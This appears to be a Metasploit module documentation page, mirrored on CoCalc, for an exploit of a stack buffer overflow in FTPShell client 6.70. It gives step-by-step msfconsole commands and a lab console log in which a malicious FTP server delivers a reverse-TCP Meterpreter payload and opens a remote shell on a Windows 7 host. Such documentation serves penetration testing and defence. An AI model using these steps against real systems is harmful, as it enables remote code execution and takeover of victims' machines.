CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/documentation/modules/exploit/windows/ftp/ftpshell_cli_bof.md
Views: 1904

Vulnerable Application

FTPShell client 6.70 (Enterprise edition) is affected by a stack-based buffer overflow vulnerability which can be leveraged by an attacker to execute arbitrary code on the target. The vulnerability is caused by improper bounds checking of the PWD command. This module has been tested successfully on Windows 7 SP1. The vulnerable application is available for download at ftpshell.com.

Verification Steps

1. Install a vulnerable FTPShell client 6.70
2. Start `msfconsole`
3. Do `use exploit/windows/ftp/ftpshell_cli_bof`
4. Do `set PAYLOAD windows/meterpreter/reverse_tcp`
5. Do `set LHOST ip`
6. Do `exploit`
7. Connect to the FTP server using FTPShell client 6.70
8. Verify the Meterpreter session is opened

Scenarios

FTPShell client 6.70 on Windows 7 SP1 x64

msf > use exploit/windows/ftp/ftpshell_cli_bof 
msf exploit(windows/ftp/ftpshell_cli_bof) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(windows/ftp/ftpshell_cli_bof) > set LHOST 172.16.106.129 
LHOST => 172.16.106.129
msf exploit(windows/ftp/ftpshell_cli_bof) > exploit 
[*] Exploit running as background job 0.

[*] Started reverse TCP handler on 172.16.106.129:4444 
[*] Please ask your target(s) to connect to 172.16.106.129:21
[*] Server started.
msf exploit(windows/ftp/ftpshell_cli_bof) > [*] 172.16.106.128 - connected.
[*] 172.16.106.128 - Response: Sending 220 Welcome
[*] 172.16.106.128 - Request: USER anonymous
[*] 172.16.106.128 - Response: sending 331 OK
[*] 172.16.106.128 - Request: PASS anonymous@anon.com
[*] 172.16.106.128 - Response: Sending 230 OK
[*] 172.16.106.128 - Request: PWD
[*] 172.16.106.128 - Request: Sending the malicious response
[*] Sending stage (179779 bytes) to 172.16.106.128
[*] Meterpreter session 1 opened (172.16.106.129:4444 -> 172.16.106.128:49263) at 2018-06-27 11:19:38 -0400

msf exploit(windows/ftp/ftpshell_cli_bof) > sessions 1
[*] Starting interaction with 1...

meterpreter > sysinfo 
Computer        : PC
OS              : Windows 7 (Build 7601, Service Pack 1).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 1
Meterpreter     : x86/windows
meterpreter >